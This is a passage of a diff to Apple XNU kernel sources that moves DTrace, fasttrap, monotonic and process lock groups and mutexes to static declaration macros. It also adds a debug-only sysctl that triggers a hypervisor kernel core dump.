LCK_MTX_DECLARE_ATTR(dtrace_meta_lock, + &dtrace_lck_grp, &dtrace_lck_attr); /* meta-provider state lock */ +static LCK_RW_DECLARE_ATTR(dtrace_dof_mode_lock, + &dtrace_lck_grp, &dtrace_lck_attr); /* dof mode lock */ /* * DTrace Provider Variables @@ -426,7 +430,7 @@ int dtrace_helptrace_enabled = 0; static dtrace_errhash_t dtrace_errhash[DTRACE_ERRHASHSZ]; static const char *dtrace_errlast; static kthread_t *dtrace_errthread; -static lck_mtx_t dtrace_errlock; +static LCK_MTX_DECLARE_ATTR(dtrace_errlock, &dtrace_lck_grp, &dtrace_lck_attr); #endif /* @@ -19200,9 +19204,8 @@ static const struct cdevsw dtrace_cdevsw = .d_reserved_2 = eno_putc, }; -lck_attr_t* dtrace_lck_attr; -lck_grp_attr_t* dtrace_lck_grp_attr; -lck_grp_t* dtrace_lck_grp; +LCK_ATTR_DECLARE(dtrace_lck_attr, 0, 0); +LCK_GRP_DECLARE(dtrace_lck_grp, "dtrace"); static int gMajDevNo; @@ -19277,25 +19280,6 @@ dtrace_init( void ) return; } - /* - * Create the dtrace lock group and attrs. - */ - dtrace_lck_attr = lck_attr_alloc_init(); - dtrace_lck_grp_attr= lck_grp_attr_alloc_init(); - dtrace_lck_grp = lck_grp_alloc_init("dtrace", dtrace_lck_grp_attr); - - /* - * We have to initialize all locks explicitly - */ - lck_mtx_init(&dtrace_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&dtrace_provider_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&dtrace_meta_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&dtrace_procwaitfor_lock, dtrace_lck_grp, dtrace_lck_attr); -#if DEBUG - lck_mtx_init(&dtrace_errlock, dtrace_lck_grp, dtrace_lck_attr); -#endif - lck_rw_init(&dtrace_dof_mode_lock, dtrace_lck_grp, dtrace_lck_attr); - /* * The cpu_core structure consists of per-CPU state available in any context. * On some architectures, this may mean that the page(s) containing the @@ -19303,9 +19287,6 @@ dtrace_init( void ) * is up to the platform to assure that this is performed properly. Note that * the structure is sized to avoid false sharing. */ - lck_mtx_init(&cpu_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&cyc_lock, dtrace_lck_grp, dtrace_lck_attr); - lck_mtx_init(&mod_lock, dtrace_lck_grp, dtrace_lck_attr); /* * Initialize the CPU offline/online hooks. @@ -19316,7 +19297,7 @@ dtrace_init( void ) cpu_core = (cpu_core_t *)kmem_zalloc( ncpu * sizeof(cpu_core_t), KM_SLEEP ); for (i = 0; i < ncpu; ++i) { - lck_mtx_init(&cpu_core[i].cpuc_pid_lock, dtrace_lck_grp, dtrace_lck_attr); + lck_mtx_init(&cpu_core[i].cpuc_pid_lock, &dtrace_lck_grp, &dtrace_lck_attr); } cpu_list = (dtrace_cpu_t *)kmem_zalloc( ncpu * sizeof(dtrace_cpu_t), KM_SLEEP ); @@ -19324,7 +19305,7 @@ dtrace_init( void ) cpu_list[i].cpu_id = (processorid_t)i; cpu_list[i].cpu_next = &(cpu_list[(i+1) % ncpu]); LIST_INIT(&cpu_list[i].cpu_cyc_list); - lck_rw_init(&cpu_list[i].cpu_ft_lock, dtrace_lck_grp, dtrace_lck_attr); + lck_rw_init(&cpu_list[i].cpu_ft_lock, &dtrace_lck_grp, &dtrace_lck_attr); } lck_mtx_lock(&cpu_lock); @@ -19340,7 +19321,6 @@ dtrace_init( void ) offsetof(dtrace_string_t, dtst_next), offsetof(dtrace_string_t, dtst_prev)); - dtrace_isa_init(); /* * See dtrace_impl.h for a description of dof modes. * The default is lazy dof. diff --git a/bsd/dev/dtrace/dtrace_glue.c b/bsd/dev/dtrace/dtrace_glue.c index ffbd0bb15..fa6dad3e7 100644 --- a/bsd/dev/dtrace/dtrace_glue.c +++ b/bsd/dev/dtrace/dtrace_glue.c @@ -226,9 +226,9 @@ done: /* * cpuvar */ -lck_mtx_t cpu_lock; -lck_mtx_t cyc_lock; -lck_mtx_t mod_lock; +LCK_MTX_DECLARE_ATTR(cpu_lock, &dtrace_lck_grp, &dtrace_lck_attr); +LCK_MTX_DECLARE_ATTR(cyc_lock, &dtrace_lck_grp, &dtrace_lck_attr); +LCK_MTX_DECLARE_ATTR(mod_lock, &dtrace_lck_grp, &dtrace_lck_attr); dtrace_cpu_t *cpu_list; cpu_core_t *cpu_core; /* XXX TLB lockdown? */ diff --git a/bsd/dev/dtrace/dtrace_subr.c b/bsd/dev/dtrace/dtrace_subr.c index 2ac848429..cdc074485 100644 --- a/bsd/dev/dtrace/dtrace_subr.c +++ b/bsd/dev/dtrace/dtrace_subr.c @@ -108,7 +108,7 @@ dtrace_fasttrap_fork(proc_t *p, proc_t *cp) * duty to resume the task. */ -lck_mtx_t dtrace_procwaitfor_lock; +LCK_MTX_DECLARE_ATTR(dtrace_procwaitfor_lock, &dtrace_lck_grp, &dtrace_lck_attr); typedef struct dtrace_proc_awaited_entry { struct dtrace_procdesc *pdesc; diff --git a/bsd/dev/dtrace/fasttrap.c b/bsd/dev/dtrace/fasttrap.c index e95eb2e1f..7129aca09 100644 --- a/bsd/dev/dtrace/fasttrap.c +++ b/bsd/dev/dtrace/fasttrap.c @@ -145,7 +145,10 @@ static dtrace_meta_provider_id_t fasttrap_meta_id; static thread_t fasttrap_cleanup_thread; -static lck_mtx_t fasttrap_cleanup_mtx; +static LCK_GRP_DECLARE(fasttrap_lck_grp, "fasttrap"); +static LCK_ATTR_DECLARE(fasttrap_lck_attr, 0, 0); +static LCK_MTX_DECLARE_ATTR(fasttrap_cleanup_mtx, + &fasttrap_lck_grp, &fasttrap_lck_attr); #define FASTTRAP_CLEANUP_PROVIDER 0x1 @@ -179,7 +182,8 @@ static fasttrap_hash_t fasttrap_provs; static fasttrap_hash_t fasttrap_procs; static uint64_t fasttrap_pid_count; /* pid ref count */ -static lck_mtx_t fasttrap_count_mtx; /* lock on ref count */ +static LCK_MTX_DECLARE_ATTR(fasttrap_count_mtx, /* lock on ref count */ + &fasttrap_lck_grp, &fasttrap_lck_attr); #define FASTTRAP_ENABLE_FAIL 1 #define FASTTRAP_ENABLE_PARTIAL 2 @@ -226,13 +230,6 @@ static const char *fasttrap_probe_t_zone_names[FASTTRAP_PROBE_T_ZONE_MAX_TRACEPO "dtrace.fasttrap_probe_t[3]" }; -/* - * APPLE NOTE: We have to manage locks explicitly - */ -lck_grp_t* fasttrap_lck_grp; -lck_grp_attr_t* fasttrap_lck_grp_attr; -lck_attr_t* fasttrap_lck_attr; - static int fasttrap_highbit(ulong_t i) { @@ -406,7 +403,8 @@ typedef struct fasttrap_tracepoint_spec { static fasttrap_tracepoint_spec_t *fasttrap_retired_spec; static size_t fasttrap_cur_retired = 0, fasttrap_retired_size; -static lck_mtx_t fasttrap_retired_mtx; +static LCK_MTX_DECLARE_ATTR(fasttrap_retired_mtx, + &fasttrap_lck_grp, &fasttrap_lck_attr); #define DEFAULT_RETIRED_SIZE 256 @@ -598,7 +596,7 @@ fasttrap_setdebug(proc_t *p) sprunlock(p); p = PROC_NULL; - mac_proc_check_get_task(state->dts_cred.dcr_cred, &pident); + (void) mac_proc_check_get_task(state->dts_cred.dcr_cred, &pident, TASK_FLAVOR_CONTROL); p = sprlock(pident.p_pid); if (p == PROC_NULL) { @@ -1521,7 +1519,7 @@ fasttrap_proc_lookup(pid_t pid) /* * APPLE NOTE: We have to initialize all locks explicitly */ - lck_mtx_init(&new_fprc->ftpc_mtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&new_fprc->ftpc_mtx, &fasttrap_lck_grp, &fasttrap_lck_attr); new_fprc->ftpc_next = bucket->ftb_data; bucket->ftb_data = new_fprc; @@ -1580,7 +1578,7 @@ fasttrap_proc_release(fasttrap_proc_t *proc) * APPLE NOTE: explicit lock management. Not 100% certain we need this, the * memory is freed even without the destroy. Maybe accounting cleanup? */ - lck_mtx_destroy(&fprc->ftpc_mtx, fasttrap_lck_grp); + lck_mtx_destroy(&fprc->ftpc_mtx, &fasttrap_lck_grp); kmem_free(fprc, sizeof (fasttrap_proc_t)); } @@ -1663,8 +1661,8 @@ fasttrap_provider_lookup(proc_t *p, fasttrap_provider_type_t provider_type, cons /* * APPLE NOTE: locks require explicit init */ - lck_mtx_init(&new_fp->ftp_mtx, fasttrap_lck_grp, fasttrap_lck_attr); - lck_mtx_init(&new_fp->ftp_cmtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&new_fp->ftp_mtx, &fasttrap_lck_grp, &fasttrap_lck_attr); + lck_mtx_init(&new_fp->ftp_cmtx, &fasttrap_lck_grp, &fasttrap_lck_attr); ASSERT(new_fp->ftp_proc != NULL); @@ -1747,8 +1745,8 @@ fasttrap_provider_free(fasttrap_provider_t *provider) * APPLE NOTE: explicit lock management. Not 100% certain we need this, the * memory is freed even without the destroy. Maybe accounting cleanup? */ - lck_mtx_destroy(&provider->ftp_mtx, fasttrap_lck_grp); - lck_mtx_destroy(&provider->ftp_cmtx, fasttrap_lck_grp); + lck_mtx_destroy(&provider->ftp_mtx, &fasttrap_lck_grp); + lck_mtx_destroy(&provider->ftp_cmtx, &fasttrap_lck_grp); kmem_free(provider, sizeof (fasttrap_provider_t)); @@ -2652,7 +2650,8 @@ fasttrap_attach(void) ASSERT(fasttrap_tpoints.fth_table != NULL); for (i = 0; i < fasttrap_tpoints.fth_nent; i++) { - lck_mtx_init(&fasttrap_tpoints.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&fasttrap_tpoints.fth_table[i].ftb_mtx, &fasttrap_lck_grp, + &fasttrap_lck_attr); } /* @@ -2670,7 +2669,8 @@ fasttrap_attach(void) ASSERT(fasttrap_provs.fth_table != NULL); for (i = 0; i < fasttrap_provs.fth_nent; i++) { - lck_mtx_init(&fasttrap_provs.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&fasttrap_provs.fth_table[i].ftb_mtx, &fasttrap_lck_grp, + &fasttrap_lck_attr); } /* @@ -2689,7 +2689,8 @@ fasttrap_attach(void) #ifndef illumos for (i = 0; i < fasttrap_procs.fth_nent; i++) { - lck_mtx_init(&fasttrap_procs.fth_table[i].ftb_mtx, fasttrap_lck_grp, fasttrap_lck_attr); + lck_mtx_init(&fasttrap_procs.fth_table[i].ftb_mtx, &fasttrap_lck_grp, + &fasttrap_lck_attr); } #endif @@ -2786,19 +2787,6 @@ fasttrap_init( void ) } - /* - * Create the fasttrap lock group. Must be done before fasttrap_attach()! - */ - fasttrap_lck_attr = lck_attr_alloc_init(); - fasttrap_lck_grp_attr= lck_grp_attr_alloc_init(); - fasttrap_lck_grp = lck_grp_alloc_init("fasttrap", fasttrap_lck_grp_attr); - - /* - * Initialize global locks - */ - lck_mtx_init(&fasttrap_cleanup_mtx, fasttrap_lck_grp, fasttrap_lck_attr); - lck_mtx_init(&fasttrap_count_mtx, fasttrap_lck_grp, fasttrap_lck_attr); - fasttrap_attach(); /* @@ -2813,7 +2801,6 @@ fasttrap_init( void ) fasttrap_retired_size = DEFAULT_RETIRED_SIZE; fasttrap_retired_spec = kmem_zalloc(fasttrap_retired_size * sizeof(*fasttrap_retired_spec), KM_SLEEP); - lck_mtx_init(&fasttrap_retired_mtx, fasttrap_lck_grp, fasttrap_lck_attr); fasttrap_inited = 1; } diff --git a/bsd/dev/dtrace/fbt.c b/bsd/dev/dtrace/fbt.c index c39912255..075227d1e 100644 --- a/bsd/dev/dtrace/fbt.c +++ b/bsd/dev/dtrace/fbt.c @@ -460,7 +460,7 @@ fbt_provide_module_kernel_syms(struct modctl *ctl) for (seg = firstsegfromheader(mh); seg != NULL; seg = nextsegfromheader(mh, seg)) { kernel_section_t *sect = firstsect(seg); - if (strcmp(seg->segname, "__KLD") == 0) { + if (strcmp(seg->segname, "__KLD") == 0 || strcmp(seg->segname, "__KLDDATA") == 0) { continue; } diff --git a/bsd/dev/dtrace/fbt_blacklist.c b/bsd/dev/dtrace/fbt_blacklist.c index a65e6a477..b06fdb36f 100644 --- a/bsd/dev/dtrace/fbt_blacklist.c +++ b/bsd/dev/dtrace/fbt_blacklist.c @@ -206,6 +206,7 @@ const char * fbt_blacklist[] = CLOSURE(prf) CLOSURE(proc_best_name) CLOSURE(proc_is64bit) + X86_ONLY(proc_require) CRITICAL(rbtrace_bt) CRITICAL(register_cpu_setup_func) CRITICAL(ret64_iret) @@ -241,6 +242,11 @@ const char * fbt_blacklist[] = CRITICAL(uread) CRITICAL(uwrite) CRITICAL(vstart) + X86_ONLY(zone_has_index) + X86_ONLY(zone_id_require) + X86_ONLY(zone_id_require_panic) + X86_ONLY(zone_range_contains) + X86_ONLY(zone_require_panic) }; #define BLACKLIST_COUNT (sizeof(fbt_blacklist)/sizeof(fbt_blacklist[0])) diff --git a/bsd/dev/dtrace/lockstat.c b/bsd/dev/dtrace/lockstat.c index b5a669e44..49f40dcff 100644 --- a/bsd/dev/dtrace/lockstat.c +++ b/bsd/dev/dtrace/lockstat.c @@ -122,8 +122,6 @@ lockstat_probe_t lockstat_probes[] = }; dtrace_id_t lockstat_probemap[LS_NPROBES]; -void (*lockstat_probe)(dtrace_id_t, uint64_t, uint64_t, - uint64_t, uint64_t, uint64_t); static dtrace_provider_id_t lockstat_id; @@ -248,9 +246,6 @@ lockstat_attach(dev_info_t *devi) return DDI_FAILURE; } - lockstat_probe = dtrace_probe; - membar_producer(); - return DDI_SUCCESS; } diff --git a/bsd/dev/dtrace/sdt_subr.c b/bsd/dev/dtrace/sdt_subr.c index 28e92734f..67f056dab 100644 --- a/bsd/dev/dtrace/sdt_subr.c +++ b/bsd/dev/dtrace/sdt_subr.c @@ -972,6 +972,9 @@ sdt_argdesc_t sdt_args[] = { {"hv", "guest-enter", 1, 1, "uint64_t *", "guest_regs_t *" }, {"hv", "guest-exit", 0, 0, "uint32_t", "uint32_t" }, {"hv", "guest-exit", 1, 1, "uint64_t *", "guest_regs_t *" }, + {"hv", "guest-error", 0, 0, "uint32_t", "uint32_t" }, + {"hv", "guest-error", 1, 1, "uint64_t *", "guest_regs_t *" }, + {"hv", "guest-error", 2, 2, "uint32_t", "uint32_t" }, { NULL, NULL, 0, 0, NULL, NULL } }; diff --git a/bsd/dev/dtrace/systrace.c b/bsd/dev/dtrace/systrace.c index 0e483d760..1342e7785 100644 --- a/bsd/dev/dtrace/systrace.c +++ b/bsd/dev/dtrace/systrace.c @@ -82,9 +82,8 @@ extern const char *syscallnames[]; #define LOADABLE_SYSCALL(a) 0 /* Not pertinent to Darwin. */ #define LOADED_SYSCALL(a) 1 /* Not pertinent to Darwin. */ -extern lck_attr_t* dtrace_lck_attr; -extern lck_grp_t* dtrace_lck_grp; -static lck_mtx_t dtrace_systrace_lock; /* probe state lock */ +static LCK_MTX_DECLARE_ATTR(dtrace_systrace_lock, + &dtrace_lck_grp, &dtrace_lck_attr); /* probe state lock */ systrace_sysent_t *systrace_sysent = NULL; void (*systrace_probe)(dtrace_id_t, uint64_t, uint64_t, uint64_t, uint64_t, uint64_t); @@ -406,7 +405,6 @@ systrace_init(const struct sysent *actual, systrace_sysent_t **interposed) s->stsy_underlying = a->sy_callc; s->stsy_return_type = a->sy_return_type; } - lck_mtx_init(&dtrace_systrace_lock, dtrace_lck_grp, dtrace_lck_attr); } @@ -489,10 +487,12 @@ systrace_enable(void *arg, dtrace_id_t id, void *parg) lck_mtx_lock(&dtrace_systrace_lock); if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying) { + /* It is not possible to write to sysent[] directly because it is const. */ vm_offset_t dss = ptrauth_nop_cast(vm_offset_t, &dtrace_systrace_syscall); ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t)); } lck_mtx_unlock(&dtrace_systrace_lock); + return 0; } @@ -507,9 +507,20 @@ systrace_disable(void *arg, dtrace_id_t id, void *parg) systrace_sysent[sysnum].stsy_return == DTRACE_IDNONE); if (disable) { + /* + * Usage of volatile protects the if statement below from being optimized away. + * + * Compilers are clever and know that const array values can't change in time + * and the if below is always false. That is because it can't see that DTrace + * injects dtrace_systrace_syscall dynamically and violates constness of the + * array. + */ + volatile const struct sysent *syscallent = &sysent[sysnum]; + lck_mtx_lock(&dtrace_systrace_lock); - if (sysent[sysnum].sy_callc == dtrace_systrace_syscall) { - ml_nofault_copy((vm_offset_t)&systrace_sysent[sysnum].stsy_underlying, (vm_offset_t)&sysent[sysnum].sy_callc, sizeof(systrace_sysent[sysnum].stsy_underlying)); + if (syscallent->sy_callc == dtrace_systrace_syscall) { + ml_nofault_copy((vm_offset_t)&systrace_sysent[sysnum].stsy_underlying, + (vm_offset_t)&syscallent->sy_callc, sizeof(vm_offset_t)); } lck_mtx_unlock(&dtrace_systrace_lock); } @@ -605,10 +616,10 @@ typedef struct { #endif /* MACH_ASSERT */ } mach_trap_t; -extern const mach_trap_t mach_trap_table[]; /* syscall_sw.h now declares this as const */ -extern int mach_trap_count; +extern const mach_trap_t mach_trap_table[]; /* syscall_sw.h now declares this as const */ +extern const int mach_trap_count; -extern const char *mach_syscall_name_table[]; +extern const char *const mach_syscall_name_table[]; /* XXX From osfmk/i386/bsd_i386.c */ struct mach_call_args { @@ -845,6 +856,7 @@ machtrace_enable(void *arg, dtrace_id_t id, void *parg) lck_mtx_lock(&dtrace_systrace_lock); if (mach_trap_table[sysnum].mach_trap_function == machtrace_sysent[sysnum].stsy_underlying) { + /* It is not possible to write to mach_trap_table[] directly because it is const. */ vm_offset_t dss = ptrauth_nop_cast(vm_offset_t, &dtrace_machtrace_syscall); ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&mach_trap_table[sysnum].mach_trap_function, sizeof(vm_offset_t)); } @@ -865,10 +877,20 @@ machtrace_disable(void *arg, dtrace_id_t id, void *parg) machtrace_sysent[sysnum].stsy_return == DTRACE_IDNONE); if (disable) { - lck_mtx_lock(&dtrace_systrace_lock); + /* + * Usage of volatile protects the if statement below from being optimized away. + * + * Compilers are clever and know that const array values can't change in time + * and the if below is always false. That is because it can't see that DTrace + * injects dtrace_machtrace_syscall dynamically and violates constness of the + * array. + */ + volatile const mach_trap_t *machtrap = &mach_trap_table[sysnum]; - if (mach_trap_table[sysnum].mach_trap_function == (mach_call_t)dtrace_machtrace_syscall) { - ml_nofault_copy((vm_offset_t)&machtrace_sysent[sysnum].stsy_underlying, (vm_offset_t)&mach_trap_table[sysnum].mach_trap_function, sizeof(vm_offset_t)); + lck_mtx_lock(&dtrace_systrace_lock); + if (machtrap->mach_trap_function == (mach_call_t)dtrace_machtrace_syscall) { + ml_nofault_copy((vm_offset_t)&machtrace_sysent[sysnum].stsy_underlying, + (vm_offset_t)&machtrap->mach_trap_function, sizeof(vm_offset_t)); } lck_mtx_unlock(&dtrace_systrace_lock); } diff --git a/bsd/dev/i386/dtrace_isa.c b/bsd/dev/i386/dtrace_isa.c index d0ac4f6c8..0391f2c18 100644 --- a/bsd/dev/i386/dtrace_isa.c +++ b/bsd/dev/i386/dtrace_isa.c @@ -165,15 +165,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg) } } -/* - * Initialization - */ -void -dtrace_isa_init(void) -{ - return; -} - /* * Runtime and ABI */ diff --git a/bsd/dev/i386/sysctl.c b/bsd/dev/i386/sysctl.c index 944df9f64..e3c160312 100644 --- a/bsd/dev/i386/sysctl.c +++ b/bsd/dev/i386/sysctl.c @@ -42,6 +42,10 @@ #include #include +#if DEBUG || DEVELOPMENT +#include +#endif + static int _i386_cpu_info SYSCTL_HANDLER_ARGS @@ -1103,4 +1107,87 @@ SYSCTL_INT(_machdep_misc, OID_AUTO, traptrace_enabled, CTLFLAG_KERN | CTLFLAG_RW | CTLFLAG_LOCKED, &traptrace_enabled, 0, "Enabled/disable trap trace"); + +/* + * Trigger a guest kernel core dump (internal only) + * Usage: sysctl kern.trigger_kernel_coredump = 1 + * (option selector must be 1, other values reserved) + */ + +static int +sysctl_trigger_kernel_coredump(struct sysctl_oid *oidp __unused, void *arg1, int arg2, struct sysctl_req *req) +{ + int error = 0; + hvg_hcall_return_t hv_ret; + char buf[2]; // 1 digit for dump option + 1 '\0' + + if (req->newptr) { + // Write request + if (req->newlen > 1) { + return EINVAL; + } + error = SYSCTL_IN(req, buf, req->newlen); + buf[req->newlen] = '\0'; + if (!error) { + if (strcmp(buf, "1") != 0) { + return EINVAL; + } + /* Issue hypercall to trigger a dump */ + hv_ret = hvg_hcall_trigger_dump(arg1, HVG_HCALL_DUMP_OPTION_REGULAR); + + /* Translate hypercall error code to syscall error code */ + switch (hv_ret) { + case HVG_HCALL_SUCCESS: + error = SYSCTL_OUT(req, arg1, 41); + break; + case HVG_HCALL_ACCESS_DENIED: + error = EPERM; + break; + case HVG_HCALL_INVALID_CODE: + case HVG_HCALL_INVALID_PARAMETER: + error = EINVAL; + break; + case HVG_HCALL_IO_FAILED: + error = EIO; + break; + case HVG_HCALL_FEAT_DISABLED: + case HVG_HCALL_UNSUPPORTED: + error = ENOTSUP; + break; + default: + error = ENODEV; + } + } + } else { + // Read request + error = SYSCTL_OUT(req, arg1, arg2); + } + return error; +} + + +static hvg_hcall_vmcore_file_t sysctl_vmcore; + +void +hvg_bsd_init(void) +{ + if (!cpuid_vmm_present()) { + return; + } + + if ((cpuid_vmm_get_applepv_features() & CPUID_LEAF_FEATURE_COREDUMP) != 0) { + /* Register an OID in the sysctl MIB tree for kern.trigger_kernel_coredump */ + struct sysctl_oid *hcall_trigger_dump_oid = zalloc_permanent(sizeof(struct sysctl_oid), ZALIGN(struct sysctl_oid)); + struct sysctl_oid oid = SYSCTL_STRUCT_INIT(_kern, + OID_AUTO, + trigger_kernel_coredump, + CTLTYPE_STRING | CTLFLAG_RW, + &sysctl_vmcore, sizeof(sysctl_vmcore), + sysctl_trigger_kernel_coredump, + "A", "Request that the hypervisor take a live kernel dump"); + *hcall_trigger_dump_oid = oid; + sysctl_register_oid(hcall_trigger_dump_oid); + } +} + #endif /* DEVELOPMENT || DEBUG */ diff --git a/bsd/dev/mem.c b/bsd/dev/mem.c index 06a5c7432..c64e63601 100644 --- a/bsd/dev/mem.c +++ b/bsd/dev/mem.c @@ -78,11 +78,13 @@ #include #include #include -#include + +#include #include #include #include /* for kernel_map */ +#include #include /* for PE_parse_boot_argn */ @@ -103,7 +105,7 @@ extern boolean_t kernacc(off_t, size_t ); #endif -static caddr_t devzerobuf; +static SECURITY_READ_ONLY_LATE(caddr_t) devzerobuf; int mmread(dev_t dev, struct uio *uio); int mmwrite(dev_t dev, struct uio *uio); @@ -219,10 +221,8 @@ mmrw(dev_t dev, struct uio *uio, enum uio_rw rw) error = 0; /* Always succeeds, always consumes all input */ break; case 3: - if (devzerobuf == NULL) { - MALLOC(devzerobuf, caddr_t, PAGE_SIZE, M_TEMP, M_WAITOK); - bzero(devzerobuf, PAGE_SIZE); - } + assert(devzerobuf != NULL); + if (uio->uio_rw == UIO_WRITE) { c = uio_curriovlen(uio); @@ -254,6 +254,14 @@ fault: #endif } +__startup_func +static void +devzerobuf_init(void) +{ + devzerobuf = zalloc_permanent(PAGE_SIZE, ZALIGN_NONE); /* zeroed */ +} +STARTUP(ZALLOC, STARTUP_RANK_LAST, devzerobuf_init); + #if CONFIG_DEV_KMEM void dev_kmem_init(void) diff --git a/bsd/dev/monotonic.c b/bsd/dev/monotonic.c index 6fc42ef7f..910f22288 100644 --- a/bsd/dev/monotonic.c +++ b/bsd/dev/monotonic.c @@ -60,7 +60,7 @@ static const struct cdevsw mt_cdevsw = { /* * Written at initialization, read-only thereafter. */ -lck_grp_t *mt_lock_grp = NULL; +LCK_GRP_DECLARE(mt_lock_grp, MT_NODE); static int mt_dev_major; static mt_device_t @@ -96,9 +96,6 @@ mt_device_assert_inuse(__assert_only mt_device_t dev) int mt_dev_init(void) { - mt_lock_grp = lck_grp_alloc_init(MT_NODE, LCK_GRP_ATTR_NULL); - assert(mt_lock_grp != NULL); - mt_dev_major = cdevsw_add(-1 /* allocate a major number */, &mt_cdevsw); if (mt_dev_major < 0) { panic("monotonic: cdevsw_add failed: %d", mt_dev_major); @@ -123,7 +120,7 @@ mt_dev_init(void) __builtin_unreachable(); } - lck_mtx_init(&mt_devices[i].mtd_lock, mt_lock_grp, LCK_ATTR_NULL); + lck_mtx_init(&mt_devices[i].mtd_lock, &mt_lock_grp, LCK_ATTR_NULL); } return 0; diff --git a/bsd/dev/munge.c b/bsd/dev/munge.c index ced3cded2..800757bf5 100644 --- a/bsd/dev/munge.c +++ b/bsd/dev/munge.c @@ -547,6 +547,12 @@ munge_llllll(void *args __unused) /* Nothing to do, already all 64-bit */ } +void +munge_llll(void *args __unused) +{ + /* Nothing to do, already all 64-bit */ +} + void munge_ll(void *args __unused) { diff --git a/bsd/kern/bsd_init.c b/bsd/kern/bsd_init.c index c204382af..6dd42a5f0 100644 --- a/bsd/kern/bsd_init.c +++ b/bsd/kern/bsd_init.c @@ -117,13 +117,13 @@ #include /* for pseudo_inits */ #include #include -#include #include #include #include #include #include +#include #include #include /* for thread_resume() */ #include /* for mcache_init() */ @@ -144,9 +144,7 @@ #include /* for gif_init() */ #include /* for devfs_kernel_mount() */ #include /* for kmem_suballoc() */ -#include /* for psem_lock_init() */ #include /* for log_setsize() */ -#include /* for tty_init() */ #include /* proc_uuid_policy_init() */ #include /* flow_divert_init() */ #include /* for cfil_init() */ @@ -231,17 +229,17 @@ int nswapmap; void *swapmap; struct swdevt swdevt[1]; +static LCK_GRP_DECLARE(hostname_lck_grp, "hostname"); +LCK_MTX_DECLARE(hostname_lock, &hostname_lck_grp); +LCK_MTX_DECLARE(domainname_lock, &hostname_lck_grp); + dev_t rootdev; /* device of the root */ dev_t dumpdev; /* device to take dumps on */ long dumplo; /* offset into dumpdev */ long hostid; char hostname[MAXHOSTNAMELEN]; -lck_mtx_t hostname_lock; -lck_grp_t *hostname_lck_grp; char domainname[MAXDOMNAMELEN]; -lck_mtx_t domainname_lock; - -char rootdevice[DEVMAXNAMESIZE]; +char rootdevice[DEVMAXNAMESIZE]; struct vnode *rootvp; bool rootvp_is_ssd = false; @@ -259,20 +257,14 @@ int legacy_footprint_entitlement_mode = LEGACY_FOOTPRINT_ENTITLEMENT_IGNORE; __private_extern__ int proc_ref_tracking_disabled = 0; /* disable panics on leaked proc refs across syscall boundary */ #endif -#if OS_REASON_DEBUG -__private_extern__ int os_reason_debug_disabled = 0; /* disable asserts for when we fail to allocate OS reasons */ -#endif - extern kern_return_t IOFindBSDRoot(char *, unsigned int, dev_t *, u_int32_t *); extern void IOSecureBSDRoot(const char * rootName); extern kern_return_t IOKitBSDInit(void ); extern boolean_t IOSetRecoveryBoot(bsd_bootfail_mode_t, uuid_t, boolean_t); extern void kminit(void); -extern void file_lock_init(void); extern void bsd_bufferinit(void); extern void oslog_setsize(int size); extern void throttle_init(void); -extern void acct_init(void); #if CONFIG_LOCKERBOOT #define LOCKER_PROTOBOOT_MOUNT "/protoboot" @@ -339,14 +331,13 @@ static void parse_bsd_args(void); #if CONFIG_DEV_KMEM extern void dev_kmem_init(void); #endif -extern void time_zone_slock_init(void); extern void select_waitq_init(void); static void process_name(const char *, proc_t); static void setconf(void); #if CONFIG_BASESYSTEMROOT -static int bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg); +static int bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg, bool *skip_signature_check); static boolean_t bsdmgroot_bootable(void); #endif // CONFIG_BASESYSTEMROOT @@ -411,25 +402,18 @@ extern struct os_refgrp rlimit_refgrp; extern thread_t cloneproc(task_t, coalition_t, proc_t, int, int); extern int (*mountroot)(void); -lck_grp_t * proc_lck_grp; -lck_grp_t * proc_slock_grp; -lck_grp_t * proc_fdmlock_grp; -lck_grp_t * proc_kqhashlock_grp; -lck_grp_t * proc_knhashlock_grp; -lck_grp_t * proc_ucred_mlock_grp; -lck_grp_t * proc_mlock_grp; -lck_grp_t * proc_dirslock_grp; -lck_grp_attr_t * proc_lck_grp_attr; -lck_attr_t * proc_lck_attr; -lck_mtx_t * proc_list_mlock; -lck_mtx_t * proc_klist_mlock; +LCK_ATTR_DECLARE(proc_lck_attr, 0, 0); +LCK_GRP_DECLARE(proc_lck_grp, "proc"); +LCK_GRP_DECLARE(proc_slock_grp, "proc-slock"); +LCK_GRP_DECLARE(proc_fdmlock_grp, "proc-fdmlock"); +LCK_GRP_DECLARE(proc_mlock_grp, "proc-mlock"); +LCK_GRP_DECLARE(proc_ucred_mlock_grp, "proc-ucred-mlock"); +LCK_GRP_DECLARE(proc_dirslock_grp, "proc-dirslock"); +LCK_GRP_DECLARE(proc_kqhashlock_grp, "proc-kqhashlock"); +LCK_GRP_DECLARE(proc_knhashlock_grp, "proc-knhashlock"); -#if CONFIG_XNUPOST -lck_grp_t * sysctl_debug_test_stackshot_owner_grp; -lck_mtx_t * sysctl_debug_test_stackshot_owner_init_mtx; -#endif /* !CONFIG_XNUPOST */ -extern lck_mtx_t * execargs_cache_lock; +LCK_MTX_DECLARE_ATTR(proc_list_mlock, &proc_mlock_grp, &proc_lck_attr); #if XNU_TARGET_OS_OSX /* hook called after root is mounted XXX temporary hack */ @@ -438,7 +422,7 @@ void (*unmountroot_pre_hook)(void); #endif void set_rootvnode(vnode_t); -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; /* called with an iocount and usecount on new_rootvnode */ void @@ -486,17 +470,6 @@ bsd_rooted_ramdisk(void) return is_ramdisk; } -/* - * This function is called before IOKit initialization, so that globals - * like the sysctl tree are initialized before kernel extensions - * are started (since they may want 